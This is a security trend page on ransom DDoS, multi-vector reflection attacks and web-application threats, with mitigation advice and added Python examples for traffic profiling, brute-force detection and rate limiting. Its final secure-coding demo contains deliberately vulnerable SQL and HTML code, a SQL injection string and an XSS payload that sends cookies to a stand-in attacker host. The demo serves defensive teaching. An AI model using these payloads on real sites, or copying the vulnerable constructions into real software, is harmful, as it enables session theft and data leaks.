The HSD Trendmonitor is designed to provide access to relevant content on various subjects in the safety and security domain, to identify relevant developments and to connect knowledge and organisations. The safety and security domain encompasses a vast number of subjects. Four relevant taxonomies (type of threat or opportunity, victim, source of threat and domain of application) have been constructed in order to visualize all of these subjects. The taxonomies and related category descriptions have been carefully composed according to other taxonomies, European and international standards and our own expertise.
In order to identify safety and security related trends, relevant reports and HSD news articles are continuously scanned, analysed and classified by hand according to the four taxonomies. This results in a wide array of observations, which we call ‘Trend Snippets’. Multiple Trend Snippets combined can provide insights into safety and security trends. The size of the circles shows the relative weight of the topic, the filters can be used to further select the most relevant content for you. If you have an addition, question or remark, drop us a line at info@securitydelta.nl.
Trends in DDoS and web-used attacks against availability and integrity
Ransom Denial of Service (RDoS) is the new trend in DDoS attacks
Ransom DDoS (RDDoS) campaigns gained substantial momentum from August 2020 onwards, with the extortion notes sent by attackers claiming to be groups such as Fancy Bear, Cozy Bear, Lazarus Group and Armada Collective. Targeted sectors included e-commerce, finance and travel, on a global scale. Ransom Denial of Service substantially reduces the resources needed to carry out an attack: criminals survey prospective targets for weak or vulnerable systems and then blackmail them, demanding a ransom in exchange for not attacking (or for stopping a short demonstration attack). A practitioner should treat such a note as an incident in its own right and confirm that the mitigation path actually works before the stated deadline, rather than relying on the threat being empty.
The COVID-19 pandemic has acted as an amplifier
DDoS attacks increased substantially in 2020 as a result of COVID-19: more than 10 million attacks (1.6 million more than in 2019) and a 22% increase in attack frequency in the last six months of 2020. Global DDoS extortion attacks also increased by 125%, making extortion one of the most critical DDoS approaches. Bandwidth originally reserved for absorbing DDoS is now consumed by remote working, which reduces an enterprise's ability to defend itself. In this context, the impact of DDoS attacks against Remote Desktop Protocol (RDP) endpoints and virtual private networks (VPNs), on which remote staff depend, increased with the pandemic.
Cybercrime-as-a-Service works as an amplifier of web-based and DDoS attacks
Cybercrime-as-a-Service is becoming a cornerstone of DDoS, opening the door to a wider population of attackers. Illegal online markets providing access to attack tools and services, together with fast internet connections, further support cybercriminals in running more complex, sophisticated and disruptive campaigns. State-sponsored actors aim to develop their capabilities to disrupt critical infrastructure and to conduct espionage against businesses, academia and governments in order to steal intellectual property.
DDoS increasingly targets smaller businesses and requires fewer financial and technical resources. Potentially disruptive attacks can target third-party providers (e.g. financial, energy and telecommunication services), with cascading effects across the supply chain.
Traditional DDoS is moving towards mobile networks and IoT
The success of the internet of things (IoT) in conjunction with 5G is producing a new wave of DDoS attacks, possibly inducing victims to pay a ransom. On one hand, 5G makes IoT more exposed to cyberattacks and enables localised DDoS, where an attacker uses a set of compromised devices to interfere with the connectivity of a specific area covered by a network slice. On the other hand, IoT devices can be used as the threat vector, i.e. as the botnet that launches the DDoS.
Sensors and devices are suitable targets of DDoS attacks because their limited resources often translate into poor security protection. Lack of industry standards, network capabilities and hardware can challenge service uptime and reliability. The problem is exacerbated in the Industrial IoT (IIoT), where vulnerabilities in third-party software components point to a lack of standardisation and safe coding guidelines.
New amplifiers and advanced sophistication for DDoS attacks emerge
Resource sharing in virtualised environments acts as an amplifier of DDoS attacks: overloading a physical resource can disrupt communications, services and access to data for every tenant that shares it. DDoS attackers are adopting intelligent strategies based on technically advanced attacks. In 2020-21, such "smart" attacks used publicly available information to monitor the countermeasures adopted by their targets and adapted their attack strategy at run time.
DDoS campaigns in 2021 have become more targeted, multi-vector and persistent
Attackers look for weaknesses to exploit and try different combinations of attack vectors; 65% of observed DDoS attacks were multi-vector, and the trend towards multi-vector attacks is consistent across sources. NEUSTAR shares the view that the majority of DDoS attack vectors rely on reflection and amplification over UDP services such as Network Time Protocol (NTP), Connectionless Lightweight Directory Access Protocol (CLDAP) and Domain Name System (DNS), alongside Internet Control Message Protocol (ICMP) floods (ICMP is not a UDP protocol but a separate vector in its own right). The practical consequence is that a mitigation tuned to one vector, e.g. a filter on UDP source port 123, only removes one component of a multi-vector attack.
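As an added example (not code from the HSD page or from the reports it summarises), the following Python script profiles inbound flow records towards one target by vector and flags the multi-vector case described above. The flow-record shape, the RFC 5737 addresses, the thresholds and the restriction to the four vectors named in the text are all assumptions made for the example:

```python
"""Profile inbound flows to one target by DDoS vector and flag multi-vector attacks.

Added example; it is not code from the HSD page or from the reports it summarises.
Assumptions (illustration only):
  - flow records are dicts in a NetFlow-like shape: proto, src_ip, src_port, dst_ip, bytes, packets
  - the vectors of interest are the ones the text names: NTP, CLDAP and DNS reflection
    over UDP, plus ICMP floods
  - thresholds (5% of inbound bytes, 400-byte average packet) are illustrative, not tuned values
"""
from collections import defaultdict

ICMP, TCP, UDP = 1, 6, 17

# UDP source ports abused as reflectors/amplifiers.  Only the three protocols named in the
# text are listed; a production list is longer (SSDP, memcached, Chargen, ...).
UDP_REFLECTOR_PORTS = {123: "NTP", 389: "CLDAP", 53: "DNS"}


def classify_flow(flow):
    """Return the vector label for one flow, or None when it matches no known vector."""
    if flow["proto"] == ICMP:
        return "ICMP"
    if flow["proto"] == UDP:
        # Reflected traffic arrives with the reflector's service port as *source* port.
        return UDP_REFLECTOR_PORTS.get(flow["src_port"])
    return None


def profile_target(flows, target_ip, min_share=0.05, min_avg_pkt=400):
    """Aggregate bytes and packets per vector towards target_ip.

    A vector is flagged when it carries at least min_share of all inbound bytes and,
    for the UDP reflection vectors, when its average packet size is at least
    min_avg_pkt bytes (amplified responses are large; ordinary DNS/NTP replies are small).
    ICMP floods are not subject to the size check because they are usually small packets.
    Returns (sorted list of flagged vectors, dict of bytes per vector).
    """
    vec_bytes = defaultdict(int)
    vec_pkts = defaultdict(int)
    total = 0
    for f in flows:
        if f["dst_ip"] != target_ip:
            continue
        total += f["bytes"]
        label = classify_flow(f)
        if label is not None:
            vec_bytes[label] += f["bytes"]
            vec_pkts[label] += f["packets"]
    flagged = []
    for label, nbytes in vec_bytes.items():
        share = nbytes / total
        avg_pkt = nbytes / max(1, vec_pkts[label])
        if share >= min_share and (label == "ICMP" or avg_pkt >= min_avg_pkt):
            flagged.append(label)
    return sorted(flagged), dict(vec_bytes)


def is_multi_vector(flagged):
    """Two or more vectors active against the same target."""
    return len(flagged) >= 2


# Constructed sample flows (RFC 5737 documentation addresses), not captured data.
TARGET = "203.0.113.10"
SAMPLE_FLOWS = [
    # NTP reflection: large UDP replies from port 123
    {"proto": UDP, "src_ip": "198.51.100.1", "src_port": 123, "dst_ip": TARGET, "bytes": 440_000, "packets": 1_000},
    # CLDAP reflection: large UDP replies from port 389
    {"proto": UDP, "src_ip": "198.51.100.2", "src_port": 389, "dst_ip": TARGET, "bytes": 600_000, "packets": 200},
    # Ordinary DNS replies: small packets, tiny share -> must NOT be flagged
    {"proto": UDP, "src_ip": "198.51.100.3", "src_port": 53, "dst_ip": TARGET, "bytes": 800, "packets": 10},
    # ICMP flood: many small packets
    {"proto": ICMP, "src_ip": "198.51.100.4", "src_port": 0, "dst_ip": TARGET, "bytes": 320_000, "packets": 5_000},
    # Legitimate HTTPS traffic
    {"proto": TCP, "src_ip": "192.0.2.7", "src_port": 443, "dst_ip": TARGET, "bytes": 50_000, "packets": 100},
    # Traffic to another host: ignored
    {"proto": UDP, "src_ip": "198.51.100.1", "src_port": 123, "dst_ip": "203.0.113.11", "bytes": 900_000, "packets": 2_000},
]

if __name__ == "__main__":
    flagged, per_vector = profile_target(SAMPLE_FLOWS, TARGET)
    print("bytes per vector:", per_vector)
    print("flagged vectors:", flagged, "multi-vector:", is_multi_vector(flagged))
```

The point to take away is in `profile_target`: each vector is scored independently, so a mitigation that drops only one of them (the UDP/123 filter mentioned above) leaves the CLDAP and ICMP components untouched. In a real deployment the port table would be much longer and the thresholds derived from a traffic baseline rather than fixed.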
Smaller organisations are being targeted
DDoS increasingly targets small enterprises, building on the rental of skills and tools to carry out attacks (Cybercrime-as-a-Service). This finding was previously discussed in IOCTA 2020, which found that cybercriminals increasingly target smaller organisations with lower security standards, ensuring successful attacks with smaller attack volumes and maximum revenue. Public institutions and critical infrastructures remain among the main targets of DDoS attacks.
Increased combination of web-based and DDoS attacks
Recalling that DDoS and web-based attacks are often coordinated activities, web applications remain vulnerable to web-related threats such as injection and cross-site scripting, and can themselves become a vector for DDoS: a flood of requests aimed at an expensive or injectable endpoint exhausts the application long before it exhausts the link. According to a recent report, SQL injection and PHP injection vulnerabilities are the most commonly exploited, while XSS is the most frequently discovered vulnerability. Blocked cross-site scripting (XSS) traffic increased substantially in Q4 2020, nearly doubling in volume from Q2 2020 to Q4 2020, with more than 15 million attacks representing 10% of blocked traffic. The Verizon 2020 Data Breach Investigations Report (DBIR), whose data set predates those quarters, found that 43% of all data breaches involved a web application and that around 90% of hacking vectors targeted web applications.
Web-based attack main trends persist
Web attacks include threats such as injection and application malfunction, and they affect IT systems in their entirety. Modern IT systems are built from services composed at run time, which can be the target of attacks and breaches. These services usually expose a standard API (e.g. REST, RPC) and interact over virtual networks or orchestration platforms, which introduces new security challenges. At the same time, "traditional" (i.e. desktop, client-side) applications suffer from long-standing issues that are still a source of bugs and attacks. Though web attacks have remained stable over the years, some points are worth noting:
- Security misconfiguration. Unpatched software, default accounts and unused but still reachable pages are the preferred means by which attackers bypass security controls and gain unauthorised access to systems. These holes can be found at every layer of a system and are difficult to manage.
- Automated brute force, dictionary and session management attacks are increasingly adopted. For instance, attackers scan for exposed Remote Desktop Protocol (RDP) endpoints (TCP port 3389 by default), brute force the credentials and then use the session to deliver malware.
- Cyber-attackers are turning security defences into weapons. For instance, the encrypted (TLS) channels deployed to protect users are used to hide malware distribution and data exfiltration from inspection, and to disrupt secured transactions.
- Untrusted compositions. Composite services are increasingly assembled from atomic services to provide advanced functionality, introducing risks beyond those of the atomic services themselves. On one hand, a composite service can increase the risk of data breaches by combining the different sources of information it has access to. On the other hand, composition entails an endemic risk: the strength of a composite application is that of its weakest link.
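The brute-force item above describes the pattern a defender has to spot: a source that finds an exposed RDP service and then hammers credentials. As an added example (not code from the page or from the reports it draws on), the following Python script runs a sliding-window detector over constructed authentication log lines. The single-line log layout is invented for the example (the Windows Security event IDs 4625 and 4624 are real, the format is not) and the thresholds are illustrative. It flags classic brute force, password spraying (one source, many accounts, few attempts each) and the case that matters most, a successful logon following a run of failures:

```python
"""Detect RDP/interactive-logon brute force and password spraying in authentication logs.

Added example; it is not code from the HSD page or from the reports it summarises.
Assumptions (illustration only):
  - log lines are in a constructed single-line shape:
        <ISO-8601 UTC timestamp> event=<id> user=<account> src=<source ip>
    The event IDs are the real Windows Security ones (4625 failed logon, 4624 successful
    logon); the line format itself is invented for the example.
  - thresholds (10 failures per source in 5 minutes, 5 distinct accounts per source,
    3 failures before a success) are illustrative and would be tuned per environment.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(r"^(?P<ts>\S+) event=(?P<event>\d+) user=(?P<user>\S+) src=(?P<src>\S+)$")
FAILED_LOGON, SUCCESSFUL_LOGON = "4625", "4624"


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "event": m["event"],
        "user": m["user"],
        "src": m["src"],
    }


def detect(lines, window=timedelta(minutes=5), max_failures=10, max_users=5,
           min_failures_before_success=3):
    """Scan log lines in order and return a list of (alert_kind, source_ip) tuples.

    Alert kinds:
      brute_force            - >= max_failures failed logons from one source inside the window
      password_spray         - one source failing against >= max_users distinct accounts
      success_after_failures - a successful logon from a source with recent failures
    Each (kind, source) pair is reported once.
    """
    recent = defaultdict(deque)  # src -> deque of (timestamp, user) for failed logons
    alerts, seen = [], set()

    def raise_alert(kind, src):
        if (kind, src) not in seen:
            seen.add((kind, src))
            alerts.append((kind, src))

    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue  # malformed line: skip, never crash the detector
        q = recent[ev["src"]]
        # Slide the window: drop failures older than `window` relative to this event.
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()
        if ev["event"] == FAILED_LOGON:
            q.append((ev["ts"], ev["user"]))
            if len(q) >= max_failures:
                raise_alert("brute_force", ev["src"])
            if len({u for _, u in q}) >= max_users:
                raise_alert("password_spray", ev["src"])
        elif ev["event"] == SUCCESSFUL_LOGON and len(q) >= min_failures_before_success:
            raise_alert("success_after_failures", ev["src"])
    return alerts


def _line(seconds, event, user, src):
    """Build one constructed log line `seconds` after a fixed start time."""
    ts = datetime(2021, 3, 2, 10, 0, 0) + timedelta(seconds=seconds)
    return f"{ts.strftime('%Y-%m-%dT%H:%M:%SZ')} event={event} user={user} src={src}"


# Constructed sample log (RFC 5737 addresses), not real telemetry.
SAMPLE_LOG = (
    # 12 failures against one account from 198.51.100.7 within two minutes, then a success.
    [_line(i * 10, FAILED_LOGON, "administrator", "198.51.100.7") for i in range(12)]
    + [_line(130, SUCCESSFUL_LOGON, "administrator", "198.51.100.7")]
    # One failure each against six different accounts from 203.0.113.9: low per-account count.
    + [_line(200 + i * 5, FAILED_LOGON, f"user{i}", "203.0.113.9") for i in range(6)]
    # Two failures from an ordinary workstation: below every threshold.
    + [_line(300, FAILED_LOGON, "alice", "192.0.2.5"), _line(330, FAILED_LOGON, "alice", "192.0.2.5")]
    # A malformed line that the parser must skip rather than crash on.
    + ["garbage that is not a log line"]
)

if __name__ == "__main__":
    for kind, src in detect(SAMPLE_LOG):
        print(f"{kind:24s} {src}")
```

The spraying rule exists because a per-account lockout threshold never fires when each account sees only one or two attempts; counting distinct accounts per source is what catches it. The success-after-failures rule is the one to route to an incident queue rather than a dashboard.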
Recommendations
Both DDoS and web-based attacks are long-standing threats, and several mitigation measures are well known and established. The following are fundamental mitigation measures for DDoS and web-based attacks, with particular focus on trends that emerged during the reporting period.
- A denial-of-service response plan is fundamental for organisations where resilience is a priority; it should include system checklists, response teams, and efficient communication and escalation procedures (including how to reach the upstream provider when the link itself is saturated).
- The security process should be a continuous activity that follows and adapts to system and network evolutions and life cycles.
- Collaboration and coordination between relevant organisations is important to multiply and strengthen mitigation efforts.
- Implement DDoS protection using an on-premises solution, a DDoS scrubbing service, or a hybrid of the two. An on-premises appliance cannot help once the upstream link is saturated; that is the case a scrubbing service covers.
- Use both a network firewall and a web application firewall (WAF). The former can be coupled with approaches that absorb traffic peaks, such as a Content Delivery Network (CDN), a load balancer and scalable resources. The latter is the layer that helps when the attack is application-level, e.g. floods of requests carrying injection or XSS payloads.
- Use antivirus solutions to curb malware infections, and hence the recruitment of your own hosts into botnets.
- Use a network-based intrusion detection system.
- Apply patches promptly, especially when many employees use their personal machines for work. Organisations should give high priority to system updates and deliver them to users remotely.
- Traffic profiling and traffic filtering can provide early warning of abnormal traffic patterns that indicate a DDoS attack.
- Use DDoS mitigation services that detect abnormal traffic flows and redirect traffic away from your network, together with rate limiting to restrict the volume of incoming traffic.
- Protect web-based APIs and monitor for related vulnerabilities.
- Harden DNS, or consider a managed DNS service. Cache poisoning and similar exploits can be prevented with DNSSEC, ideally through a managed DNS vendor that supports it. Note that DNSSEC authenticates responses but does not keep authoritative servers reachable; a managed anycast provider is what addresses DDoS against the DNS service itself.
- Consider a multi-layered solution mixing detection, investigation and response capabilities across multiple platforms.
- Build a threat intelligence programme based on a proactive approach that adapts the security posture to the evolving threat environment.
- Use staff training and cybersecurity exercises to increase capacity building and preparedness.
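Rate limiting is listed above without detail. As an added example (not code from the page or from any vendor it mentions), the following Python implementation is a per-source token bucket, with the detail a practitioner tends to learn the hard way: the limiter's own per-source state must be bounded, otherwise an attacker with many spoofed sources turns the limiter into a memory-exhaustion target. The source keys, time values and limits are constructed for the example:

```python
"""Per-source token-bucket rate limiting with bounded state.

Added example; it is not code from the HSD page or from any product it mentions.
Assumptions (illustration only): requests are identified by a source key (here an IP
address), `now` is a monotonic time in seconds supplied by the caller so the behaviour is
deterministic, and the limits (rate, burst, max tracked sources) are placeholders.
"""
from collections import OrderedDict


class TokenBucket:
    """Allows `burst` requests at once, then `rate` requests per second on average."""

    def __init__(self, rate, burst, now):
        self.rate = float(rate)
        self.burst = float(burst)
        self.tokens = float(burst)
        self.last = now

    def allow(self, now):
        # Refill proportionally to elapsed time, capped at the burst size, then spend one token.
        elapsed = max(0.0, now - self.last)
        self.last = now
        self.tokens = min(self.burst, self.tokens + elapsed * self.rate)
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


class PerSourceLimiter:
    """One bucket per source, with the bucket table capped.

    Unbounded per-source state would let an attacker with many spoofed sources exhaust
    the limiter's own memory, so the least recently seen source is evicted when the cap
    is reached.  The trade-off: an evicted source gets a fresh bucket when it returns.
    """

    def __init__(self, rate, burst, max_sources):
        self.rate, self.burst, self.max_sources = rate, burst, max_sources
        self.buckets = OrderedDict()  # insertion order doubles as recency order

    def allow(self, src, now):
        bucket = self.buckets.get(src)
        if bucket is None:
            if len(self.buckets) >= self.max_sources:
                self.buckets.popitem(last=False)  # evict least recently used source
            bucket = TokenBucket(self.rate, self.burst, now)
            self.buckets[src] = bucket
        else:
            self.buckets.move_to_end(src)  # mark as most recently used
        return bucket.allow(now)


def simulate(requests, rate=1.0, burst=5, max_sources=2):
    """Replay (time, source) pairs through a limiter; return the allow/deny decision list."""
    limiter = PerSourceLimiter(rate, burst, max_sources)
    return [limiter.allow(src, t) for t, src in requests]


# Constructed request trace (RFC 5737 addresses), not captured traffic.
SAMPLE_REQUESTS = (
    [(0.0, "198.51.100.7")] * 7     # burst of 7 at t=0: 5 allowed, 2 denied
    + [(2.0, "198.51.100.7")] * 3   # 2 s later: 2 tokens refilled -> 2 allowed, 1 denied
    + [(2.0, "192.0.2.5")]          # unrelated source: its own bucket, allowed
)

if __name__ == "__main__":
    print(simulate(SAMPLE_REQUESTS))
```

Per-source limiting only helps against sources that can be identified. A volumetric attack with spoofed addresses or a large botnet still saturates the link upstream of the limiter, which is the case the scrubbing service above is for.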
Countermeasures for mitigating web-based attacks are as follows:
- Set up a web application firewall (WAF) to identify and filter malicious requests. The WAF rule set must be kept updated to protect the system against newly discovered vulnerabilities; a WAF is a compensating control, not a substitute for fixing the code.
- Strengthen the code base (e.g. input validation, parametrised statements, context-aware output encoding) to protect against injection-based attacks.
- Update software promptly to close the window between a vulnerability's disclosure and its exploitation (patching cannot address a true zero-day, which is why the other layers matter).
- Properly configure and harden web servers, and regularly patch all servers exposed to the Internet.
- Continuously verify the effectiveness of your hardening, using attack tools, vulnerability scanners and penetration testing services.
- Enable logging and inspect the logs.
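The "strengthen the code base" item is best read against concrete code. As an added example (not code from the page or from any product it mentions), the following Python snippet puts the vulnerable SQL and HTML constructions next to their hardened forms, using an in-memory SQLite table and constructed payloads as stand-ins for the application:

```python
"""Injection and XSS: the vulnerable construction next to the hardened one.

Added example; it is not code from the HSD page or from any project it mentions.
Assumptions (illustration only): a SQLite in-memory `users` table stands in for the
application database, and `render_profile_*` stands in for a template that reflects the
username into HTML.  Both *_vulnerable functions are deliberately insecure.
"""
import html
import sqlite3


def make_db():
    """Create an in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice", "alice@example.org"), ("bob", "bob@example.org")],
    )
    return conn


def lookup_user_vulnerable(conn, username):
    """String concatenation: user input becomes part of the SQL grammar (SQL injection)."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_user_hardened(conn, username):
    """Parametrised statement: the driver keeps the value separate from the query text."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def render_profile_vulnerable(username):
    """Reflects untrusted input straight into HTML (reflected XSS)."""
    return f"<p>Hello, {username}</p>"


def render_profile_hardened(username):
    """Output encoding for the HTML body context; quote=True also covers attribute values."""
    return f"<p>Hello, {html.escape(username, quote=True)}</p>"


# Constructed payloads.
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", lookup_user_vulnerable(conn, SQLI_PAYLOAD))  # every row leaks
    print("hardened:  ", lookup_user_hardened(conn, SQLI_PAYLOAD))    # no such user
    print(render_profile_vulnerable(XSS_PAYLOAD))
    print(render_profile_hardened(XSS_PAYLOAD))
```

Parametrisation protects the query structure, not identifiers: a user-selected column name or sort order still needs an allow-list. Likewise `html.escape` is correct for the HTML body and attribute contexts only; a value inserted into JavaScript or a URL needs the encoding for that context.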